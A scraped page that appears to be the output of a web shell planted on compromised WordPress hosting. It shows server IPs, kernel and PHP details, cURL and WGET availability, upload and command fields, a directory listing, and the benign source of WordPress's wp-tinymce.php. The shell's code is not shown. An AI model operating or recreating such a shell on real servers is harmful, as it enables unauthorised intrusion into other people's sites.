Server IP : 192.250.235.76 / Your IP : 45.90.210.12
System : Linux s2968.sgp1.stableserver.net 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
PHP Version : 8.2.29
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
1902120114081995
Server IP : 198.54.116.172 / Your IP : 216.73.216.36
System : Linux server322.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : mail
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Upload Files :
Command :
Current File : /home/sadasgfe/poem.sadatrend.com/wp-includes/js/tinymce//wp-tinymce.php
<?php
/**
* Not used in core since 5.1.
* This is a back-compat for plugins that may be using this method of loading directly.
*/
/**
* Disable error reporting
*
* Set this to error_reporting( -1 ) for debugging.
*/
error_reporting( 0 );
$basepath = __DIR__;
function get_file( $path ) {
if ( function_exists( 'realpath' ) ) {
$path = realpath( $path );
}
if ( ! $path || ! @is_file( $path ) ) {
return false;
}
return @file_get_contents( $path );
}
$expires_offset = 31536000; // 1 year.
header( 'Content-Type: application/javascript; charset=UTF-8' );
header( 'Vary: Accept-Encoding' ); // Handle proxies.
header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' );
header( "Cache-Control: public, max-age=$expires_offset" );
$file = get_file( $basepath . '/wp-tinymce.js' );
if ( isset( $_GET['c'] ) && $file ) {
echo $file;
} else {
// Even further back compat.
echo get_file( $basepath . '/tinymce.min.js' );
echo get_file( $basepath . '/plugins/compat3x/plugin.min.js' );
}
exit;
Name
Size
Last Modified
Owner / Group
Permissions
Options
.. -- December 03 2025 06:33:00 sadasgfe / sadasgfe 0755 langs -- June 05 2025 02:23:14 sadasgfe / sadasgfe 0755 plugins -- June 05 2025 02:23:14 sadasgfe / sadasgfe 0755 skins -- June 05 2025 02:23:14 sadasgfe / sadasgfe 0755 themes -- June 05 2025 02:23:14 sadasgfe / sadasgfe 0755 utils -- June 05 2025 02:23:14 sadasgfe / sadasgfe 0755 license.txt 25.821 KB May 08 2017 09:32:46 sadasgfe / sadasgfe 0644 tiny_mce_popup.js 15.613 KB September 27 2017 01:15:48 sadasgfe / sadasgfe 0644 tinymce.min.js 357.002 KB November 10 2020 15:44:08 sadasgfe / sadasgfe 0644 wp-tinymce.js 655.696 KB March 17 2025 20:16:26 sadasgfe / sadasgfe 0644 wp-tinymce.php 1.018 KB February 06 2020 11:33:12 sadasgfe / sadasgfe 0644